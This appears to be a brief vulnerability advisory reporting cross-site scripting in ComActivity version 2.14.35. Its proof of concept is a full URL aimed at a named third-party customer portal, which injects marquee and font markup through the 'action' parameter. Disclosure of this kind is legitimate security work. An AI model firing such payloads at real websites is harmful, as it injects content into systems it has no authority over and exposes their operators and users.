ComActivity version 2.14.35 suffers from a cross site scripting vulnerability.
811f05821587559d1d5b5dfda3115d93ba677e4524b0e3cfec7d39332bac3a40
========================================================================
| # Title : ComActivity Ver 2.14.35 XSS vulnerability
| # Author : indoushka
| # email : https://www.facebook.com/Indoushka.official/
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : Ver 2.14.35
| # Vendor : http://www.comactivity.com.au/
========================================================================
POc :
https://kundportal.kabe.se/portal?submit=Account%20Login&action=JLoginUser%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E&password=1
Greetz :----------------------------------------------------------------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
========================================================================